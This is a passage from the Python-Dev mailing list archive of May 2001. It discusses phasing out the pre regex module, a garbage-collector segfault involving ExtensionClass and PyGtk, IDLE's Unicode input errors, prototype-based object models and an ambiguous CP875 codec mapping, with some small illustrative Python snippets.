Subject: [Python-Dev] status of pre?
In-Reply-To: Your message of "Fri, 11 May 2001 12:25:54 -0400."
             <15100.4754.950053.844678@cj42289-a.reston1.va.home.com> 
References: <15100.4754.950053.844678@cj42289-a.reston1.va.home.com> 
Message-ID: <200105111847.NAA05835@cj20424-a.reston1.va.home.com>

>   Have we formulated a plan of action regarding PCRE and the pre
> module?  Are we planning to leave them in for another version, or is
> SRE considered sufficiently stable?

Hm.  It should disappear but I believe I've heard people say they were
forced to use it because of the recursion limit problems with SRE on
some platforms.

We could put a warning on using pre or pcre in 2.2, and remove it in
2.3, hoping that /F fixes the recursion limit problems in the mean
time (weren't those related to the backtracking implementation)?
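One way such a warning could be emitted, sketched under assumptions: it uses the standard `warnings` module (present since 2.1) in Python 3 syntax, and the helper name `warn_deprecated_module` is hypothetical, not anything in the actual pre.py. The idea is a call at the top level of the module slated for removal.

```python
import warnings

def warn_deprecated_module(name: str, replacement: str) -> None:
    """Emit a DeprecationWarning saying module `name` should be replaced.

    stacklevel=2 attributes the warning to the code that called this helper
    (e.g. the top level of the deprecated module) rather than to the helper.
    """
    warnings.warn(
        "the %s module is deprecated; use %s instead" % (name, replacement),
        DeprecationWarning,
        stacklevel=2,
    )

# Hypothetical usage, at the top of the module being phased out:
#     warn_deprecated_module("pre", "re")
```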

--Guido van Rossum (home page: http://www.python.org/~guido/)


From skip at pobox.com  Fri May 11 22:41:30 2001
From: skip at pobox.com (skip at pobox.com)
Date: Fri, 11 May 2001 15:41:30 -0500
Subject: [Python-Dev] GC and ExtensionClass
Message-ID: <15100.20090.573866.569667@beluga.mojam.com>

Has anyone investigated interactions between ExtensionClass objects and GC?
I've encountered segfaults with 2.1 in certain situations when using the
latest PyGtk stuff.  The gdb traceback (appended) sort of suggests the two
intersect somewhere.  PyGtk provides a Python interface to the Gtk widget
set using ExtensionClasses.  Any ideas how I should approach the problem?  I
don't know either piece of code at all and the code that generates the
segfault isn't particularly small, not to mention which it uses the bleeding
edge Gtk stuff (which I doubt anyone on this list will have installed) and a
version of ExtensionClass patched by James Henstridge, the PyGtk author.

Here's what I know:

    1. Disabling gc gets rid of the segfault
    2. I only see the problem with importing a specific module that
       subclasses the GtkTextView widget from the Python command line.  If I
       run it as a script from the shell prompt, I get no segfault.
    3. If I first import the gtk module, then import my module, I get no
       segfault. 
    4. Most changes I make to the module causing the problem cause the
       problem to disappear.

All told, all this really tells me is I'm probably dealing with a
malloc/free problem of some sort.
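Observations 1 and 2 suggest comparing the same import with the collector off and with it made very aggressive. The following is a sketch in Python 3 syntax (the 2.1-era equivalent would use `__import__`). The helper name `import_with_gc` is hypothetical. Lowering the generation-0 threshold makes collections run much more often, which tends to make a corrupted container show up sooner and more repeatably. A module already in `sys.modules` is returned from the cache without re-running its code, so this needs a fresh interpreter per trial.

```python
import gc
import importlib
from typing import Optional

def import_with_gc(name: str, gc_enabled: bool = True,
                   threshold: Optional[int] = None):
    """Import module `name` with the cyclic GC switched on or off.

    If `threshold` is given (and GC is enabled), it replaces threshold0,
    so small values make collections run far more often than the default.
    The caller's GC state and thresholds are restored afterwards.
    """
    was_enabled = gc.isenabled()
    old_threshold = gc.get_threshold()
    try:
        if gc_enabled:
            gc.enable()
            if threshold is not None:
                gc.set_threshold(threshold)
        else:
            gc.disable()
        return importlib.import_module(name)
    finally:
        # Restore whatever GC configuration the caller had.
        gc.set_threshold(*old_threshold)
        if was_enabled:
            gc.enable()
        else:
            gc.disable()
```

For example, `import_with_gc("seg", gc_enabled=False)` in one run and `import_with_gc("seg", threshold=1)` in another, with `seg` being the module name that appears in the backtrace below.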

Neil and/or Jim (and/or anyone else willing to look into this problem), I
can give you access to my development machine via ssh if you think that
would help debug the problem.

Skip

#0  0x0807163d in visit_decref (op=0x4034ece0, data=0x0)
    at ../Modules/gcmodule.c:153
#1  0x08096dc6 in tupletraverse (o=0x8290d6c, visit=0x8071630 <visit_decref>, 
    arg=0x0) at ../Objects/tupleobject.c:366
#2  0x08071672 in subtract_refs (containers=0x80b8ac0)
    at ../Modules/gcmodule.c:167
#3  0x08071abf in collect (young=0x80b8ac0, old=0x80b8acc)
    at ../Modules/gcmodule.c:379
#4  0x08071d53 in collect_generations () at ../Modules/gcmodule.c:484
#5  0x08071db7 in _PyGC_Insert (op=0x82ea9c4) at ../Modules/gcmodule.c:507
#6  0x0808d743 in PyDict_New () at ../Objects/dictobject.c:149
#7  0x401ef977 in getBaseDictionary (type=0x4034d320) at ExtensionClass.c:1244
#8  0x401f0979 in initializeBaseExtensionClass (self=0x4034d320)
    at ExtensionClass.c:1485
#9  0x401f6774 in export_subclassed_type (dict=0x82d33a4, 
    name=0x40337c55 "GtkTreeViewColumn", typ=0x4034d320, bases=0x82ea9a4)
    at ExtensionClass.c:3410
#10 0x4022a360 in pygobject_register_class (dict=0x82d33a4, 
    class_name=0x40337c55 "GtkTreeViewColumn", 
    get_type=0x404c4080 <gtk_tree_view_column_get_type>, ec=0x4034d320, 
    bases=0x82ea9a4) at gobjectmodule.c:202
#11 0x4032fd7e in pygtk_register_classes (d=0x82d33a4) at gtk.c:30071
#12 0x402f0ed0 in init_gtk () at gtkmodule.c:98
#13 0x0806927c in _PyImport_LoadDynamicModule (name=0xbfffcd00 "gtk._gtk", 
    pathname=0xbfffc870 "/usr/local/lib/python2.1/site-packages/gtk/_gtkmodule.so", fp=0x82ab6e0) at ../Python/importdl.c:52
#14 0x08067780 in load_module (name=0xbfffcd00 "gtk._gtk", fp=0x82ab6e0, 
    buf=0xbfffc870 "/usr/local/lib/python2.1/site-packages/gtk/_gtkmodule.so", 
    type=3) at ../Python/import.c:1296
#15 0x080683eb in import_submodule (mod=0x82963bc, subname=0xbfffcd04 "_gtk", 
    fullname=0xbfffcd00 "gtk._gtk") at ../Python/import.c:1815
#16 0x08067f6a in load_next (mod=0x82963bc, altmod=0x80bf3cc, 
    p_name=0xbfffd130, buf=0xbfffcd00 "gtk._gtk", p_buflen=0xbfffccfc)
    at ../Python/import.c:1671
#17 0x08067bcc in import_module_ex (name=0x0, globals=0x8295f1c, 
    locals=0x8295f1c, fromlist=0x8296864) at ../Python/import.c:1522
#18 0x08067d23 in PyImport_ImportModuleEx (name=0x8290aac "_gtk", 
    globals=0x8295f1c, locals=0x8295f1c, fromlist=0x8296864)
    at ../Python/import.c:1563
#19 0x0809f4b9 in builtin___import__ (self=0x0, args=0x8291124)
    at ../Python/bltinmodule.c:31
#20 0x080591e3 in call_cfunction (func=0x80cdcf0, arg=0x8291124, kw=0x0)
    at ../Python/ceval.c:2838
#21 0x080590d5 in call_object (func=0x80cdcf0, arg=0x8291124, kw=0x0)
    at ../Python/ceval.c:2801
#22 0x08058f9c in PyEval_CallObjectWithKeywords (func=0x80cdcf0, 
    arg=0x8291124, kw=0x0) at ../Python/ceval.c:2734
#23 0x08057764 in eval_code2 (co=0x82910d0, globals=0x8295f1c, 
    locals=0x8295f1c, args=0x0, argcount=0, kws=0x0, kwcount=0, defs=0x0, 
    defcount=0, closure=0x0) at ../Python/ceval.c:1820
#24 0x08055085 in PyEval_EvalCode (co=0x82910d0, globals=0x8295f1c, 
    locals=0x8295f1c) at ../Python/ceval.c:346
#25 0x08066a86 in PyImport_ExecCodeModuleEx (name=0xbfffe0b0 "gtk", 
    co=0x82910d0, 
    pathname=0xbfffd340 "/usr/local/lib/python2.1/site-packages/gtk/__init__.pyc") at ../Python/import.c:490
#26 0x08066fc7 in load_source_module (name=0xbfffe0b0 "gtk", 
    pathname=0xbfffd7b0 "/usr/local/lib/python2.1/site-packages/gtk/__init__.py", fp=0x80d1a20) at ../Python/import.c:754
#27 0x0806775e in load_module (name=0xbfffe0b0 "gtk", fp=0x80d1a20, 
    buf=0xbfffd7b0 "/usr/local/lib/python2.1/site-packages/gtk/__init__.py", 
    type=1) at ../Python/import.c:1287
#28 0x08067129 in load_package (name=0xbfffe0b0 "gtk", 
    pathname=0xbfffdc20 "/usr/local/lib/python2.1/site-packages/gtk")
    at ../Python/import.c:811
#29 0x08067791 in load_module (name=0xbfffe0b0 "gtk", fp=0x0, 
    buf=0xbfffdc20 "/usr/local/lib/python2.1/site-packages/gtk", type=5)
    at ../Python/import.c:1310
#30 0x080683eb in import_submodule (mod=0x80bf3cc, subname=0xbfffe0b0 "gtk", 
    fullname=0xbfffe0b0 "gtk") at ../Python/import.c:1815
#31 0x08067f6a in load_next (mod=0x80bf3cc, altmod=0x80bf3cc, 
    p_name=0xbfffe4e0, buf=0xbfffe0b0 "gtk", p_buflen=0xbfffe0ac)
    at ../Python/import.c:1671
#32 0x08067bcc in import_module_ex (name=0x0, globals=0x828c3fc, 
    locals=0x828c3fc, fromlist=0x80bf3cc) at ../Python/import.c:1522
#33 0x08067d23 in PyImport_ImportModuleEx (name=0x811556c "gtk", 
    globals=0x828c3fc, locals=0x828c3fc, fromlist=0x80bf3cc)
    at ../Python/import.c:1563
#34 0x0809f4b9 in builtin___import__ (self=0x0, args=0x829651c)
    at ../Python/bltinmodule.c:31
#35 0x080591e3 in call_cfunction (func=0x80cdcf0, arg=0x829651c, kw=0x0)
    at ../Python/ceval.c:2838
#36 0x080590d5 in call_object (func=0x80cdcf0, arg=0x829651c, kw=0x0)
    at ../Python/ceval.c:2801
#37 0x08058f9c in PyEval_CallObjectWithKeywords (func=0x80cdcf0, 
    arg=0x829651c, kw=0x0) at ../Python/ceval.c:2734
#38 0x08057764 in eval_code2 (co=0x82968b8, globals=0x828c3fc, 
    locals=0x828c3fc, args=0x0, argcount=0, kws=0x0, kwcount=0, defs=0x0, 
    defcount=0, closure=0x0) at ../Python/ceval.c:1820
#39 0x08055085 in PyEval_EvalCode (co=0x82968b8, globals=0x828c3fc, 
    locals=0x828c3fc) at ../Python/ceval.c:346
#40 0x08066a86 in PyImport_ExecCodeModuleEx (name=0xbfffeff0 "seg", 
    co=0x82968b8, pathname=0xbfffe6f0 "seg.pyc") at ../Python/import.c:490
#41 0x08066fc7 in load_source_module (name=0xbfffeff0 "seg", 
    pathname=0xbfffeb60 "seg.py", fp=0x820cd60) at ../Python/import.c:754
#42 0x0806775e in load_module (name=0xbfffeff0 "seg", fp=0x820cd60, 
    buf=0xbfffeb60 "seg.py", type=1) at ../Python/import.c:1287
#43 0x080683eb in import_submodule (mod=0x80bf3cc, subname=0xbfffeff0 "seg", 
    fullname=0xbfffeff0 "seg") at ../Python/import.c:1815
#44 0x08067f6a in load_next (mod=0x80bf3cc, altmod=0x80bf3cc, 
    p_name=0xbffff420, buf=0xbfffeff0 "seg", p_buflen=0xbfffefec)
    at ../Python/import.c:1671
#45 0x08067bcc in import_module_ex (name=0x0, globals=0x80d21e4, 
    locals=0x80d21e4, fromlist=0x80bf3cc) at ../Python/import.c:1522
#46 0x08067d23 in PyImport_ImportModuleEx (name=0x828c61c "seg", 
    globals=0x80d21e4, locals=0x80d21e4, fromlist=0x80bf3cc)
    at ../Python/import.c:1563
#47 0x0809f4b9 in builtin___import__ (self=0x0, args=0x80e7bc4)
    at ../Python/bltinmodule.c:31
#48 0x080591e3 in call_cfunction (func=0x80cdcf0, arg=0x80e7bc4, kw=0x0)
    at ../Python/ceval.c:2838
#49 0x080590d5 in call_object (func=0x80cdcf0, arg=0x80e7bc4, kw=0x0)
    at ../Python/ceval.c:2801
#50 0x08058f9c in PyEval_CallObjectWithKeywords (func=0x80cdcf0, 
    arg=0x80e7bc4, kw=0x0) at ../Python/ceval.c:2734
#51 0x08057764 in eval_code2 (co=0x8115908, globals=0x80d21e4, 
    locals=0x80d21e4, args=0x0, argcount=0, kws=0x0, kwcount=0, defs=0x0, 
    defcount=0, closure=0x0) at ../Python/ceval.c:1820
#52 0x08055085 in PyEval_EvalCode (co=0x8115908, globals=0x80d21e4, 
    locals=0x80d21e4) at ../Python/ceval.c:346
#53 0x0806da1f in run_node (n=0x8115558, filename=0x80a496d "<stdin>", 
    globals=0x80d21e4, locals=0x80d21e4, flags=0xbffff708)
    at ../Python/pythonrun.c:1045
#54 0x0806cb2a in PyRun_InteractiveOneFlags (fp=0x4018e620, 
    filename=0x80a496d "<stdin>", flags=0xbffff708)
    at ../Python/pythonrun.c:570
#55 0x0806c98c in PyRun_InteractiveLoopFlags (fp=0x4018e620, 
    filename=0x80a496d "<stdin>", flags=0xbffff708)
    at ../Python/pythonrun.c:510
#56 0x0806c85a in PyRun_AnyFileExFlags (fp=0x4018e620, 
    filename=0x80a496d "<stdin>", closeit=0, flags=0xbffff708)
    at ../Python/pythonrun.c:473
#57 0x08051fae in Py_Main (argc=1, argv=0xbffff78c) at ../Modules/main.c:320
#58 0x400831f0 in __libc_start_main () from /lib/libc.so.6


From guido at digicool.com  Fri May 11 23:49:00 2001
From: guido at digicool.com (Guido van Rossum)
Date: Fri, 11 May 2001 16:49:00 -0500
Subject: [Python-Dev] GC and ExtensionClass
In-Reply-To: Your message of "Fri, 11 May 2001 15:41:30 EST."
             <15100.20090.573866.569667@beluga.mojam.com> 
References: <15100.20090.573866.569667@beluga.mojam.com> 
Message-ID: <200105112149.QAA07533@cj20424-a.reston1.va.home.com>

> Has anyone investigated interactions between ExtensionClass objects and GC?
> I've encountered segfaults with 2.1 in certain situations when using the
> latest PyGtk stuff.  The gdb traceback (appended) sort of suggests the two
> intersect somewhere.  PyGtk provides a Python interface to the Gtk widget
> get using ExtensionClasses.  Any ideas how I should approach the problem?  I
> don't know either piece of code at all and the code that generates the
> segfault isn't particularly small, not to mention which it uses the bleeding
> edge Gtk stuff (which I doubt anyone on this list will have installed) and a
> version of ExtensionClass patched by James Henstridge, the PyGtk author.
> 
> Here's what I know:
> 
>     1. Disabling gc gets rid of the segfault
>     2. I only see the problem with importing a specific module that
>        subclasses the GtkTextView widget from the Python command line.  If I
>        run it as a script from the shell prompt, I get no segfault.
>     3. If I first import the gtk module, then import my module, I get no
>        segfault. 
>     4. Most changes I make to the module causing the problem cause the
>        problemm to disappear.
> 
> All told, all this really tells me is I'm probably dealing with a
> malloc/free problem of some sort.
> 
> Neil and/or Jim (and/or anyone else willing to look into this problem), I
> can give you access to my development machine via ssh if you think that
> would help debug the problem.

AFAIK, the latest version of Zope (which uses ExtensionClass
extensively if not exclusively :-) works fine with Python 2.1.

This suggests pointing a finger towards the PyGtk code... :-(

--Guido van Rossum (home page: http://www.python.org/~guido/)


From loewis at informatik.hu-berlin.de  Fri May 11 22:53:55 2001
From: loewis at informatik.hu-berlin.de (Martin von Loewis)
Date: Fri, 11 May 2001 22:53:55 +0200 (MEST)
Subject: [Python-Dev] IDLE and non-ASCII characters
Message-ID: <200105112053.WAA15657@pandora.informatik.hu-berlin.de>

Thanks to a bug report I got, I noticed for the first time that you
cannot enter non-ASCII characters in IDLE anymore. Eg. at the shell
prompt, you may get

>>> s='??'
UnicodeError: ASCII encoding error: ordinal not in range(128)

Likewise, when trying to save a file that has non-ASCII characters,
you get a traceback.

Now, I think I understand all the causes of the problem (Tkinter
returning Unicode objects, and so on). However, I'm curious whether
anybody has proposals on how to deal with it.

For saving text files, if Python had an encoding directive, things
might be easier :-) For the shell prompt, I've no idea how to solve
this best.
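In Python 3 terms, the error above comes from implicitly encoding Unicode text with the ASCII codec. The following is a minimal sketch of making that encoding explicit instead. The function name `to_bytes` is hypothetical, and falling back to the locale's preferred encoding is an assumption about what a user would expect, not what IDLE actually does.

```python
import locale
from typing import Optional

def to_bytes(text: str, fallback: Optional[str] = None) -> bytes:
    """Encode text as ASCII when possible, else with an explicit fallback encoding.

    If no fallback is given, the locale's preferred encoding is used.
    This can still raise UnicodeEncodeError if the fallback cannot
    represent the text.
    """
    try:
        return text.encode("ascii")
    except UnicodeEncodeError:
        encoding = fallback or locale.getpreferredencoding(False)
        return text.encode(encoding)
```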

So any suggestions are welcome.

Regards,
Martin


From fredrik at pythonware.com  Sat May 12 00:18:27 2001
From: fredrik at pythonware.com (Fredrik Lundh)
Date: Sat, 12 May 2001 00:18:27 +0200
Subject: [Python-Dev] status of pre?
References: <15100.4754.950053.844678@cj42289-a.reston1.va.home.com>  <200105111847.NAA05835@cj20424-a.reston1.va.home.com>
Message-ID: <00ca01c0da68$4fc66570$e46940d5@hagrid>

guido wrote:
> 
> We could put a warning on using pre or pcre in 2.2, and remove it in
> 2.3, hoping that /F fixes the recursion limit problems in the mean
> time (weren't those related to the backtracking implementation)?

2.2 is to be released in October, right?  I'm sure I could shake
out the remaining bugs in my "stackless SRE" patch until then...

Cheers /F


From fredrik at effbot.org  Sat May 12 01:03:10 2001
From: fredrik at effbot.org (Fredrik Lundh)
Date: Sat, 12 May 2001 01:03:10 +0200
Subject: [Python-Dev] Hats off to them!
Message-ID: <014a01c0da6e$93578ca0$e46940d5@hagrid>

http://www.theregister.co.uk/content/4/18909.html

    "Microsoft Altair BASIC legend talks about Linux, CPRM and
    that very frightening photo

    ...

    His other passion, he tells us, is Python. 

    "Hats off to them. It's an extremely well designed language. It's
    object orientated from the get-go. They've really succeeded there,"
    he says, and commends it as the ideal teaching language. That
    used to be BASIC, of course"

    ...

(no, it's not Bill)

Cheers /F


From fredrik at effbot.org  Sat May 12 01:14:47 2001
From: fredrik at effbot.org (Fredrik Lundh)
Date: Sat, 12 May 2001 01:14:47 +0200
Subject: [Python-Dev] Hats off to them!
References: <014a01c0da6e$93578ca0$e46940d5@hagrid>
Message-ID: <015001c0da70$3078cf70$e46940d5@hagrid>

>     "Hats off to them. It's an extremely well designed language. It's
>     object orientated from the get-go. They've really succeeded there,"
>     he says, and commends it as the ideal teaching language. That
>     used to be BASIC, of course"

reading on, I'm not sure why BASIC ever was the ideal teaching
language:

http://www.americanhistory.si.edu/csr/comphist/gates.htm#tc11

    "One of the nice things about this BASIC is it has this so called
    direct mode. So you can PRINT 2 + 2. It prints the square root
    of ten"

Cheers /F


From sdm7g at Virginia.EDU  Sat May 12 04:43:31 2001
From: sdm7g at Virginia.EDU (Steven D. Majewski)
Date: Fri, 11 May 2001 22:43:31 -0400 (EDT)
Subject: [Python-Dev] Type/class
In-Reply-To: <016d01c0da30$a99a9720$e000a8c0@thomasnotebook>
Message-ID: <Pine.NXT.4.21.0105112009300.248-100000@localhost.virginia.edu>


On Fri, 11 May 2001, Thomas Heller wrote:

> I never looked at Self or other prototype based systems.
> Is it really true that prototypes are a lot simpler than
> metaclasses, but on the other hand more powerful?

Definitely simpler: No classes, No metaclasses, only objects.

Ignore for now the fact that a limited set of classes are 
handier for a statically type checked language and just 
consider dynamic languages, which is their proper domain.      

Prototype semantics basically subsume class semantics. 
Any object can be an exemplar and fill the role of a class,
and it can be used ONLY as a template and holder of shared
behaviour, so it can be used like a class. 
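The following is a minimal sketch of single-parent prototype objects in Python 3. The names `Proto`, `clone` and `send` are hypothetical, and this is not how Self or XlispStat implement it. Each object has its own slots plus a parent. A failed lookup is delegated up the parent chain, assignment always lands in the receiver, and an exemplar holding shared behaviour plays the role of a class.

```python
class Proto:
    """A prototype object: its own slots plus an optional parent to delegate to."""

    def __init__(self, parent=None, **slots):
        # Bypass our own __setattr__ while setting up the internal fields.
        object.__setattr__(self, "_parent", parent)
        object.__setattr__(self, "_slots", dict(slots))

    def clone(self, **overrides):
        """Create a new object whose parent is self, with optional slot overrides."""
        return Proto(parent=self, **overrides)

    def __getattr__(self, name):
        # Called only when normal lookup fails: search own slots, then each parent.
        obj = self
        while obj is not None:
            slots = object.__getattribute__(obj, "_slots")
            if name in slots:
                return slots[name]
            obj = object.__getattribute__(obj, "_parent")
        raise AttributeError(name)

    def __setattr__(self, name, value):
        # Assignment always goes into the receiver's own slots, never a parent's.
        self._slots[name] = value

    def send(self, name, *args):
        """Look up `name` along the parent chain and call it with self as receiver."""
        return getattr(self, name)(self, *args)


# An exemplar filling the role of a "class": it holds the shared behaviour.
point = Proto(x=0, y=0, norm2=lambda self: self.x ** 2 + self.y ** 2)
p = point.clone(x=3, y=4)   # instance-like clone overriding data slots
q = p.clone(y=0)            # a clone of a clone: inherits x=3 from p
print(p.send("norm2"))      # 25
print(q.send("norm2"))      # 9
```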

[One of the Self papers -- one which I haven't read -- is
entitled "Self includes Smalltalk"  -- and is, I believe,
a demonstration that Smalltalk is sort of a subset of Self.]


But you can also have finer grain classification and you 
can have object inheritance. ( This is handy in XlispStat,
which is oriented towards statistics and analysis: you can
have derived objects, for example different subsamples of
the same population, or in my app, different energy spectra,
along with derived and processed spectra with special rules
for treatment: e.g. linear filtered spectra have a filter
function or kernel, and if they are fit against reference
spectra, they need to be fit against references that have 
had the same filter applied to them -- if none available
create one from unfiltered samples -- and maybe a whole
chain of derived data. In a class based system, you would
have to manually maintain a separate linked list of objects,
but in a prototype system they can all be cloned from their
parent objects. )   

The other plus for things like exploratory statistics is that
you don't have to design a class hierarchy ahead of time -- 
it's more concrete and less abstract than a class based system.

Prototypes can also solve some of the sort of problems that
Jim Fulton's acquisition framework in Zope is designed to 
handle. (But it's been a while since I read that paper and
I haven't used it, so I'm relying on my memory of thinking
"Yeah -- that would be simpler with prototypes" ) 

You definitely don't have to worry about simulating the 
Prototype Pattern. (I've seen GUI systems in C++ that go
thru a lot of code to add prototype-like behavior to C++ classes.) 


But -- unless I can figure a useful way to use it under the
covers, it's not really a topic for python-dev.  


> The 'brain exploding properties' of metaclasses are IMO
> only there because my brain cannot think easily in too
> many recursion steps...

It's just like spelling bananana -- the problem is to know
when to stop! ;-)


-- Steve Majewski


From tim_one at email.msn.com  Sat May 12 13:28:27 2001
From: tim_one at email.msn.com (Tim Peters)
Date: Sat, 12 May 2001 07:28:27 -0400
Subject: [Python-Dev] Ill-defined encoding for CP875?
Message-ID: <LNBBLJKPBEHFEDALKOLCOELPKBAA.tim_one@email.msn.com>

I have a way to make dict lookup a teensy bit cheaper(*) that significantly
reduces the number of collisions (which is much more valuable).

This caused a number of std tests to fail, because they were implicitly
relying on the order in which a dict's entries are materialized via .keys()
or .items().

Most of these were easy enough to fix.  The last failure remaining is
test_unicode, and I don't know how to fix it.  It's dying here:

    try:
        verify(unicode(s,encoding).encode(encoding) == s)
    except TestFailed:
        print '*** codec "%s" failed round-trip' % encoding
    except ValueError,why:
        print '*** codec for "%s" failed: %s' % (encoding, why)

when encoding == "cp875".  There's a bogus problem you have to worm around
first:  test_unicode neglected to import TestFailed, so it actually dies
with NameError while trying the "except TestFailed" clause after verify()
raises TestFailed.  Once that's repaired, it's complaining about failing the
round-trip encoding.

The original character in s it's griping about is "?" (0x3f).  cp875.py has
this entry in its decoding_map dict:

	0x003f: 0x001a,	# SUBSTITUTE

But 0x1a is not a *unique* value in this dict.  There's also

	0x00dc: 0x001a,	# SUBSTITUTE
	0x00e1: 0x001a,	# SUBSTITUTE
	0x00ec: 0x001a,	# SUBSTITUTE
	0x00ed: 0x001a,	# SUBSTITUTE
	0x00fc: 0x001a,	# SUBSTITUTE
	0x00fd: 0x001a,	# SUBSTITUTE

Therefore what appears associated with 0x1a in the derived encoding_map
dict:

encoding_map = {}
for k,v in decoding_map.items():
    encoding_map[v] = k

may end up being any of the 7 decoding_map keys that map to 0x1a.  It just
so happened to map back to 0x3f before, but to 0xfd after the dict change,
so "?" doesn't survive the round trip anymore.

My knowledge of encoding internals is exceeded only by my mastery of file
URLs under Windows <wink>, so I could sure use some help getting this
repaired.  I'd really like to check in the dict improvement (+ test
repairs), but won't do it so long as it makes a std test fail.  If, e.g.,
you're *relying* on "the first" of a set of ambiguous reverse mappings
winning the game, then iterating over decoding_map.items() in reverse sorted
order would do the trick reliably.  But I don't know whether the ambiguity
in cp875 is a bug or an undocumented feature ...
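The reverse-sorted inversion suggested above can be sketched as follows, in Python 3 syntax with hypothetical helper names. It makes the smallest source byte win for every ambiguous target, whatever order the dict yields its items in. Whether "smallest key wins" is the right policy for cp875 is exactly the open question. A second helper lists which targets are ambiguous at all. The excerpt contains only the seven SUBSTITUTE entries quoted above.

```python
def invert_decoding_map(decoding_map):
    """Build an encoding map in which, for ambiguous targets, the smallest key wins.

    Iterating in reverse sorted order means the last write for each value
    comes from the smallest key, independent of dict iteration order.
    """
    encoding_map = {}
    for k, v in sorted(decoding_map.items(), reverse=True):
        encoding_map[v] = k
    return encoding_map

def ambiguous_targets(decoding_map):
    """Return {value: sorted keys} for every value reached from more than one key."""
    seen = {}
    for k, v in decoding_map.items():
        seen.setdefault(v, []).append(k)
    return {v: sorted(ks) for v, ks in seen.items() if len(ks) > 1}

# The seven cp875 entries quoted above that all decode to U+001A SUBSTITUTE.
excerpt = {0x3f: 0x1a, 0xdc: 0x1a, 0xe1: 0x1a, 0xec: 0x1a,
           0xed: 0x1a, 0xfc: 0x1a, 0xfd: 0x1a}
print(hex(invert_decoding_map(excerpt)[0x1a]))   # 0x3f
print(ambiguous_targets(excerpt))
```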

7-bit-ascii-looks-better-every-day<wink>-ly y'rs  - tim


(*) Simply by taking the damn "~" off "~hash" -- I explained quite a while
ago why that can lead to a weak form of clustering "in theory", and
instrumenting the dict lookup code confirmed that it does hurt in real life.


From guido at digicool.com  Sat May 12 14:28:23 2001
From: guido at digicool.com (Guido van Rossum)
Date: Sat, 12 May 2001 07:28:23 -0500
Subject: [Python-Dev] prototypes (was: Type/class)
In-Reply-To: Your message of "Fri, 11 May 2001 22:43:31 -0400."
             <Pine.NXT.4.21.0105112009300.248-100000@localhost.virginia.edu> 
References: <Pine.NXT.4.21.0105112009300.248-100000@localhost.virginia.edu> 
Message-ID: <200105121228.HAA08988@cj20424-a.reston1.va.home.com>

Do prototype-based languages have the equivalent of multiple
inheritance?

--Guido van Rossum (home page: http://www.python.org/~guido/)


From tim_one at email.msn.com  Sat May 12 14:16:33 2001
From: tim_one at email.msn.com (Tim Peters)
Date: Sat, 12 May 2001 08:16:33 -0400
Subject: [Python-Dev] prototypes (was: Type/class)
In-Reply-To: <200105121228.HAA08988@cj20424-a.reston1.va.home.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCEEMBKBAA.tim_one@email.msn.com>

[Guido]
> Do prototype-based languages have the equivalent of multiple
> inheritance?

Just as for class-based languages, whether a prototype-based language
supports an MI workalike varies by language.  In a class-based language with
MI, a class can have multiple base classes; in a prototype-based language
with an MI workalike, an object can have multiple prototype objects.  The
same kinds of ambiguities can arise, and the same kinds of resolution
strategies are applicable (imposed linearization; user-supplied
qualification; user-supplied renaming; guessing <0.7 wink>).
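To make the "imposed linearization" strategy concrete, here is a toy prototype object model in Python. The `Proto` class is invented for illustration and does not model any particular language: each object has its own slots plus an ordered list of prototypes, and lookup searches depth-first, left to right, so the leftmost prototype wins a conflict.

```python
class Proto:
    """A prototype-style object: its own slots plus an ordered list of parents."""

    def __init__(self, *parents, **slots):
        self.parents = list(parents)
        self.slots = dict(slots)

    def lookup(self, name):
        # Imposed linearization: own slots first, then each parent
        # depth-first, left to right (one of several possible strategies).
        if name in self.slots:
            return self.slots[name]
        for parent in self.parents:
            try:
                return parent.lookup(name)
            except KeyError:
                pass
        raise KeyError(name)


printable = Proto(describe="printable")
serializable = Proto(describe="serializable", fmt="json")
doc = Proto(printable, serializable, title="report")

print(doc.lookup("describe"))  # printable (leftmost prototype wins)
print(doc.lookup("fmt"))       # json (only the second prototype has it)
```

User-supplied qualification would correspond to asking a specific parent directly, e.g. `serializable.lookup("describe")`.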

JavaScript is the best-known prototype language that does not support
multiple prototypes per object.  A very readable intro to its object model
is here:

  http://developer.netscape.com/docs/manuals/communicator/jsobj/jsobj.pdf

It's interesting because, near the end, the author explores a bit how far
you can get *trying* to fake MI in JS.  The answer is "farther than you
might think", but not all the way.


From fredrik at pythonware.com  Sat May 12 14:25:43 2001
From: fredrik at pythonware.com (Fredrik Lundh)
Date: Sat, 12 May 2001 14:25:43 +0200
Subject: [Python-Dev] Ill-defined encoding for CP875?
References: <LNBBLJKPBEHFEDALKOLCOELPKBAA.tim_one@email.msn.com>
Message-ID: <02e501c0dade$ab7f1080$e46940d5@hagrid>

tim wrote:
> If, e.g., you're *relying* on "the first" of a set of ambiguous reverse mappings
> winning the game, then iterating over decoding_map.items() in reverse sorted
> order would do the trick reliably.

reverse sorting makes sense to me.  but the cp-files appear to be
machine generated, so patching that python file won't help.

> But I don't know whether the ambiguity in cp875 is a bug or an undocumented
> feature ...

a truly future-proof solution would be to specify exactly how to resolve
every many-to-one mapping, for every font having that problem.  but
sorting them is clearly better than relying on implementation-dependent
behaviour...

(is Jython using exactly the same hashing and dictionary algorithms as
CPython?  or does it work by accident also under Jython?)

Cheers /F


From nas at python.ca  Sat May 12 16:28:54 2001
From: nas at python.ca (Neil Schemenauer)
Date: Sat, 12 May 2001 07:28:54 -0700
Subject: [Python-Dev] GC and ExtensionClass
In-Reply-To: <15100.20090.573866.569667@beluga.mojam.com>; from skip@pobox.com on Fri, May 11, 2001 at 03:41:30PM -0500
References: <15100.20090.573866.569667@beluga.mojam.com>
Message-ID: <20010512072854.A4271@glacier.fnational.com>

skip at pobox.com wrote:
> 
> Has anyone investigated interactions between ExtensionClass objects and GC?
> I've encountered segfaults with 2.1 in certain situations when using the
> latest PyGtk stuff.

Do any of the PyGtk objects define the GC type flag?

The GC is fairly good at exposing memory management bugs that
otherwise go unnoticed.  If you're using glibc you can try setting
the MALLOC_CHECK_ environment variable to 2.  If you've got lots
of memory you could also try running your program under Electric
Fence.  Finally, you might try compiling with Py_DEBUG
set.
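If the crashing program can be started from a script, the variable can be set for that one child process only. A minimal sketch for Python 3.7+; `run_with_malloc_check` is a hypothetical helper, and `MALLOC_CHECK_` only has an effect with glibc's malloc:

```python
import os
import subprocess
import sys


def run_with_malloc_check(argv, level="2"):
    """Run argv with glibc's MALLOC_CHECK_ set only for the child process."""
    # Copy the current environment so the parent process is unaffected.
    env = dict(os.environ, MALLOC_CHECK_=level)
    return subprocess.run(argv, env=env, capture_output=True, text=True)


if __name__ == "__main__":
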